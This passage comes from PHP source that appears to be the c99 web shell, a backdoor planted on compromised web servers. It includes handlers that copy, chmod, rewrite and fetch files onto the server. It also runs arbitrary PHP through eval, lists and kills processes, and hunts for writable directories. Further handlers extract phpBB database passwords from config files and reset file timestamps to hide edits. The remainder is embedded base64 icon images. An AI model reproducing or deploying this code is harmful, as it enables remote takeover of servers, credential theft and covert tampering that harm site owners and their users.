  2415.     if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
  2416.     else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
  2417.   }
  2418.   elseif ($fsfunc=="rename") {
  2419.     if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
  2420.     else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
  2421.   }
  2422.   elseif ($fsfunc=="chmod") {
  2423.     if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
  2424.     else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
  2425.   }
  2426.   elseif ($fsfunc=="read") {
  2427.     $hasil = @file_get_contents($arg1);
  2428.     echo "<b>Filename:</b> $arg1<br>";
  2429.     echo "<textarea cols=150 rows=20>";
  2430.     echo $hasil;
  2431.     echo "</textarea>\n";
  2432.   }
  2433.   elseif ($fsfunc=="write") {
  2434.     if(@file_put_contents($d.$arg1,$arg2)) {
  2435.       echo "<b>Saved!</b> ".$d.$arg1;
  2436.     }
  2437.     else { echo "<div class=yxerrmsg>Couldn't write to $arg1!</div>"; }
  2438.   }
  2439.   elseif ($fsfunc=="downloadbin") {
  2440.     $handle = fopen($arg1, "rb");
  2441.     $contents = '';
  2442.     while (!feof($handle)) {
  2443.       $contents .= fread($handle, 8192);
  2444.     }
  2445.     $r = @fopen($d.$arg2,'w');
  2446.     if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
  2447.     else { echo "<div class=yxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
  2448.     fclose($r);
  2449.     fclose($handle);
  2450.   }
  2451.   elseif ($fsfunc=="download") {
  2452.     $text = implode('', file($arg1));
  2453.     if ($text) {
  2454.       $r = @fopen($d.$arg2,'w');
  2455.       if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
  2456.       else { echo "<div class=yxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
  2457.       fclose($r);
  2458.     }
  2459.     else { echo "<div class=yxerrmsg>Couldn't download from $arg1!</div>";}
  2460.   }
  2461.   elseif ($fsfunc=='mkdir') {
  2462.     $thedir = $d.$arg1;
  2463.     if ($thedir != $d) {
  2464.       if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
  2465.       elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
  2466.       else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
  2467.     }
  2468.     else { echo "Couldn't create current dir:<b> $thedir</b>"; }
  2469.   }
  2470.   elseif ($fsfunc=='fwritabledir') {
  2471.     function recurse_dir($dir,$max_dir) {
  2472.       global $dir_count;
  2473.       $dir_count++;
  2474.       if( $cdir = @dir($dir) ) {
  2475.         while( $entry = $cdir-> read() ) {
  2476.           if( $entry != '.' && $entry != '..' ) {
  2477.            if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
  2478.             if ($dir_count > $max_dir) { return; }
  2479.               echo "[".$dir_count."] ".$dir.$entry."\n";
  2480.               recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
  2481.             }
  2482.           }
  2483.         }
  2484.         $cdir->close();
  2485.       }
  2486.     }
  2487.     if (!$arg1) { $arg1 = $d; }
  2488.     if (!$arg2) { $arg2 = 10; }
  2489.     echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<br>";
  2490.     echo "<pre>";
  2491.     recurse_dir($arg1,$arg2);
  2492.     echo "</pre>";
  2493.     $total = $dir_count - 1;
  2494.     echo "<b>Founds:</b> ".$total." of <b>Max</b> $arg2";
  2495.   }
  2496.   else {
  2497.     if (!$arg1) { echo "<div class=yxerrmsg>No operation! Please fill parameter [A]!</div>\n"; }
  2498.     else {
  2499.       if ($hasil = $fsfunc($arg1)) {
  2500.         echo "<b>Result of $fsfunc $arg1:</b><br>";
  2501.         if (!is_array($hasil)) { echo "$hasil\n"; }
  2502.         else {
  2503.           echo "<pre>";
  2504.           foreach ($hasil as $v) { echo $v."\n"; }
  2505.           echo "</pre>";
  2506.         }
  2507.       }
  2508.       else { echo "<div class=yxerrmsg>$fsfunc $arg1 failed!</div>\n"; }
  2509.     }
  2510.   }
  2511.   echo "</div>\n";
  2512. }
  2513. if ($act == "processes") {
  2514.   echo "<div class=barheader>.: Processes :.</div>";
  2515.   if (!$win) { $handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":""); }
  2516.   else { $handler = "tasklist"; }
  2517.   $ret = myshellexec($handler);
  2518.   if (!$ret) { echo "Can't execute \"".$handler."\"!"; }
  2519.   else {
  2520.     if (empty($processes_sort)) {$processes_sort = $sort_default;}
  2521.     $parsesort = parsesort($processes_sort);
  2522.     if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  2523.     $k = $parsesort[0];
  2524.     if ($parsesort[1] != "a") {
  2525.       $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
  2526.     }
  2527.     else {
  2528.       $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
  2529.     }
  2530.     $ret = htmlspecialchars($ret);
  2531.     if (!$win) {
  2532.       if ($pid) {
  2533.         if (is_null($sig)) {$sig = 9;}
  2534.         echo "Sending signal ".$sig." to #".$pid."... ";
  2535.         if (posix_kill($pid,$sig)) {echo "OK.";}
  2536.         else {echo "ERROR.";}
  2537.       }
  2538.       while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  2539.       $stack = explode("\n",$ret);
  2540.       $head = explode(" ",$stack[0]);
  2541.       unset($stack[0]);
  2542.       for($i=0;$i<count($head);$i++) {
  2543.        if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
  2544.       }
  2545.       $prcs = array();
  2546.       foreach ($stack as $line) {
  2547.         if (!empty($line)) {
  2548.           echo "<tr>";
  2549.           $line = explode(" ",$line);
  2550.           $line[10] = join(" ",array_slice($line,10));
  2551.           $line = array_slice($line,0,11);
  2552.           if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
  2553.           $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  2554.           $prcs[] = $line;
  2555.           echo "</tr>";
  2556.         }
  2557.       }
  2558.     }
  2559.     //For Windows - Fixed By s4l1ty_
  2560.     else {
  2561.       while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  2562.       while (ereg("=",$ret)) {$ret = str_replace("=","",$ret);}
  2563.       $ret = convert_cyr_string($ret,"d","w");
  2564.       $stack = explode("\n",$ret);
  2565.       unset($stack[0],$stack[2]);
  2566.       $stack = array_values($stack);
  2567.       $stack[0]=str_replace("Image Name","ImageName",$stack[0]);
  2568.       $stack[0]=str_replace("Session Name","SessionName",$stack[0]);
  2569.       $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
  2570.       $head = explode(" ",$stack[0]);
  2571.       $stack = array_slice($stack,1);
  2572.       $head = array_values($head);
  2573.       if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; }
  2574.       else { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; }
  2575.       if ($k > count($head)) {$k = count($head)-1;}
  2576.       for($i=0;$i<count($head);$i++) {
  2577.        if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
  2578.       }
  2579.       $prcs = array();
  2580.       unset($stack[0]);
  2581.       foreach ($stack as $line) {
  2582.         if (!empty($line)) {
  2583.           $line = explode(" ",$line);
  2584.           $line[4] = str_replace(".","",$line[4]);
  2585.           $line[4] = intval($line[4]) * 1024;
  2586.           unset($line[5]);
  2587.           $prcs[] = $line;
  2588.         }
  2589.       }
  2590.     }
  2591.     $head[$k] = "<b>".$head[$k]."</b>".$y;
  2592.     $v = $processes_sort[0];
  2593.     usort($prcs,"tabsort");
  2594.     if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  2595.     $tab = array();
  2596.     $tab[] = $head;
  2597.     $tab = array_merge($tab,$prcs);
  2598.     echo "<table class=explorer>";
  2599.     foreach($tab as $i=>$k) {
  2600.       echo "<tr>";
  2601.       foreach($k as $j=>$v) {
  2602.         if ($win and $i > 0 and $j == 4) {$v = view_size($v);}
  2603.         echo "<td>".$v."</td>";
  2604.       }
  2605.       echo "</tr>";
  2606.     }
  2607.     echo "</table>";
  2608.   }
  2609. }
  2610. if ($act == "eval") {
  2611.   if (!empty($eval)) {
  2612.     echo "Result of execution this PHP-code:<br>";
  2613.     $tmp = ob_get_contents();
  2614.     $olddir = realpath(".");
  2615.     @chdir($d);
  2616.     if ($tmp) {
  2617.       ob_clean();
  2618.       eval($eval);
  2619.       $ret = ob_get_contents();
  2620.       $ret = convert_cyr_string($ret,"d","w");
  2621.       ob_clean();
  2622.       echo $tmp;
  2623.       if ($eval_txt) {
  2624.         $rows = count(explode("\r\n",$ret))+1;
  2625.         if ($rows < 10) {$rows = 10;}
  2626.        echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  2627.       }
  2628.       else {echo $ret."<br>";}
  2629.     }
  2630.     else {
  2631.       if ($eval_txt) {
  2632.         echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  2633.         eval($eval);
  2634.         echo "</textarea>";
  2635.       }
  2636.       else {echo $ret;}
  2637.     }
  2638.     @chdir($olddir);
  2639.   }
  2640.   else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
  2641.   echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
  2642. }
  2643. if ($act == "f") {
  2644.   echo "<div align=left>";
  2645.   if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
  2646.     if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  2647.     else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
  2648.   }
  2649.   else {
  2650.     $r = @file_get_contents($d.$f);
  2651.     $ext = explode(".",$f);
  2652.     $c = count($ext)-1;
  2653.     $ext = $ext[$c];
  2654.     $ext = strtolower($ext);
  2655.     $rft = "";
  2656.     foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  2657.     if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  2658.     if (empty($ft)) {$ft = $rft;}
  2659.     $arr = array(
  2660.         array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
  2661.         array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
  2662.         array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
  2663.         array("Code","code"),
  2664.         array("Session","phpsess"),
  2665.         array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
  2666.         array("SDB","sdb"),
  2667.         array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
  2668.         array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
  2669.         array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
  2670.         array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
  2671.         array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
  2672.     );
  2673.     echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
  2674.     foreach($arr as $t) {
  2675.       if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
  2676.       elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
  2677.       else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
  2678.       echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
  2679.     }
  2680.     echo "<hr size=\"1\" noshade>";
  2681.     if ($ft == "info") {
  2682.       echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
  2683.       if (!$win) {
  2684.         echo "<tr><td><b>Owner/Group</b></td><td> ";
  2685.         $ow = posix_getpwuid(fileowner($d.$f));
  2686.         $gr = posix_getgrgid(filegroup($d.$f));
  2687.         echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
  2688.       }
  2689.       echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
  2690.       $fi = fopen($d.$f,"rb");
  2691.       if ($fi) {
  2692.         if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
  2693.         else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
  2694.         $n = 0;
  2695.         $a0 = "00000000<br>";
  2696.         $a1 = "";
  2697.         $a2 = "";
  2698.         for ($i=0; $i<strlen($str); $i++) {
  2699.          $a1 .= sprintf("%02X",ord($str[$i]))." ";
  2700.          switch (ord($str[$i])) {
  2701.            case 0:  $a2 .= "<font>0</font>"; break;
  2702.             case 32:
  2703.             case 10:
  2704.             case 13: $a2 .= "&nbsp;"; break;
  2705.             default: $a2 .= htmlspecialchars($str[$i]);
  2706.           }
  2707.           $n++;
  2708.           if ($n == $hexdump_rows) {
  2709.             $n = 0;
  2710.             if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
  2711.             $a1 .= "<br>";
  2712.             $a2 .= "<br>";
  2713.           }
  2714.         }
  2715.         echo "<table border=1 bgcolor=#666666>".
  2716.              "<tr><td bgcolor=#666666>".$a0."</td>".
  2717.              "<td bgcolor=#000000>".$a1."</td>".
  2718.              "<td bgcolor=#000000>".$a2."</td>".
  2719.              "</tr></table><br>";
  2720.       }
  2721.       $encoded = "";
  2722.       if ($base64 == 1) {
  2723.         echo "<b>Base64 Encode</b><br>";
  2724.         $encoded = base64_encode(file_get_contents($d.$f));
  2725.       }
  2726.       elseif($base64 == 2) {
  2727.         echo "<b>Base64 Encode + Chunk</b><br>";
  2728.         $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
  2729.       }
  2730.       elseif($base64 == 3) {
  2731.         echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
  2732.         $encoded = base64_encode(file_get_contents($d.$f));
  2733.         $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  2734.       }
  2735.       elseif($base64 == 4) {
  2736.         $text = file_get_contents($d.$f);
  2737.         $encoded = base64_decode($text);
  2738.         echo "<b>Base64 Decode";
  2739.     if (base64_encode($encoded) != $text) {echo " (failed)";}
  2740.     echo "</b><br>";
  2741.    }
  2742.    if (!empty($encoded))
  2743.    {
  2744.     echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  2745.    }
  2746.    echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
  2747.         <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
  2748.         <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
  2749.         <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
  2750.         <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
  2751.         <P>";
  2752.   }
  2753.   elseif ($ft == "html") {
  2754.    if ($white) {@ob_clean();}
  2755.    echo $r;
  2756.    if ($white) {c99shexit();}
  2757.   }
  2758.   elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
  2759.   elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
  2760.   elseif ($ft == "phpsess") {
  2761.    echo "<pre>";
  2762.    $v = explode("|",$r);
  2763.    echo $v[0]."<br>";
  2764.    var_dump(unserialize($v[1]));
  2765.    echo "</pre>";
  2766.   }
  2767.   elseif ($ft == "exe") {
  2768.    $ext = explode(".",$f);
  2769.    $c = count($ext)-1;
  2770.    $ext = $ext[$c];
  2771.    $ext = strtolower($ext);
  2772.    $rft = "";
  2773.    foreach($exeftypes as $k=>$v)
  2774.    {
  2775.     if (in_array($ext,$v)) {$rft = $k; break;}
  2776.    }
  2777.    $cmd = str_replace("%f%",$f,$rft);
  2778.    echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
  2779.   }
  2780.   elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
  2781.   elseif ($ft == "code") {
  2782.     if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
  2783.       $arr = explode("\n",$r);
  2784.       if (count($arr == 18)) {
  2785.         include($d.$f);
  2786.         echo "<b>phpBB configuration is detected in this file!<br>";
  2787.         if ($dbms == "mysql4") {$dbms = "mysql";}
  2788.         if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
  2789.         else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";}
  2790.         echo "Parameters for manual connect:<br>";
  2791.         $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
  2792.         foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  2793.         echo "</b><hr size=\"1\" noshade>";
  2794.       }
  2795.     }
  2796.     echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
  2797.     if (!empty($white)) {@ob_clean();}
  2798.     highlight_file($d.$f);
  2799.     if (!empty($white)) {c99shexit();}
  2800.     echo "</div>";
  2801.   }
  2802.   elseif ($ft == "download") {
  2803.     @ob_clean();
  2804.     header("Content-type: application/octet-stream");
  2805.     header("Content-length: ".filesize($d.$f));
  2806.     header("Content-disposition: attachment; filename=\"".$f."\";");
  2807.     echo $r;
  2808.     exit;
  2809.   }
  2810.   elseif ($ft == "notepad") {
  2811.     @ob_clean();
  2812.     header("Content-type: text/plain");
  2813.     header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  2814.     echo($r);
  2815.     exit;
  2816.   }
  2817.   elseif ($ft == "img") {
  2818.     $inf = getimagesize($d.$f);
  2819.     if (!$white) {
  2820.       if (empty($imgsize)) {$imgsize = 20;}
  2821.       $width = $inf[0]/100*$imgsize;
  2822.       $height = $inf[1]/100*$imgsize;
  2823.       echo "<center><b>Size:</b>&nbsp;";
  2824.       $sizes = array("100","50","20");
  2825.       foreach ($sizes as $v) {
  2826.         echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
  2827.         if ($imgsize != $v ) {echo $v;}
  2828.         else {echo "<u>".$v."</u>";}
  2829.         echo "</a>&nbsp;&nbsp;&nbsp;";
  2830.       }
  2831.       echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
  2832.     }
  2833.     else {
  2834.       @ob_clean();
  2835.       $ext = explode($f,".");
  2836.       $ext = $ext[count($ext)-1];
  2837.       header("Content-type: ".$inf["mime"]);
  2838.       readfile($d.$f);
  2839.       exit;
  2840.     }
  2841.   }
  2842.   elseif ($ft == "edit") {
  2843.    if (!empty($submit))
  2844.    {
  2845.     if ($filestealth) {$stat = stat($d.$f);}
  2846.     $fp = fopen($d.$f,"w");
  2847.     if (!$fp) {echo "<b>Can't write to file!</b>";}
  2848.     else
  2849.     {
  2850.      echo "<b>Saved!</b>";
  2851.      fwrite($fp,$edit_text);
  2852.      fclose($fp);
  2853.      if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  2854.      $r = $edit_text;
  2855.     }
  2856.    }
  2857.    $rows = count(explode("\r\n",$r));
  2858.    if ($rows < 10) {$rows = 10;}
  2859.   if ($rows > 30) {$rows = 30;}
  2860.    echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  2861.   }
  2862.   elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  2863.   else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
  2864. }
  2865. echo "</div>\n";
  2866. }
  2867. }
  2868. else {
  2869. @ob_clean();
  2870. $images = array(
  2871. "arrow_ltr"=>
  2872. "R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQSIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
  2873. "back"=>
  2874. "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  2875. "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
  2876. "Wg0JADs=",
  2877. "buffer"=>
  2878. "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
  2879. "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGyxChg+xhnRB+ptLOhai1crEmD".
  2880. "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
  2881. "change"=>
  2882. "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
  2883. "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
  2884. "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
  2885. "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
  2886. "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
  2887. "zMshADs=",
  2888. "delete"=>
  2889. "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1yx19cwXOfDw8Kenp/n5+etgeunp".
  2890. "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9yx7djcscSM93d3ZGRkeEsTevd4LCw".
  2891. "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
  2892. "vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
  2893. "ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
  2894. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2895. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
  2896. "BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
  2897. "STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
  2898. "BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
  2899. "jwVFHBgiEGQFIgQasYkcSbJQIAA7",
  2900. "download"=>
  2901. "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
  2902. "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
  2903. "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
  2904. "forward"=>
  2905. "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  2906. "aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
  2907. "WqsJADs=",
  2908. "home"=>
  2909. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
  2910. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
  2911. "krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
  2912. "VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
  2913. "mode"=>
  2914. "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9yx////wAAAAAAAAAAAAAAAAAAAAAA".
  2915. "AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
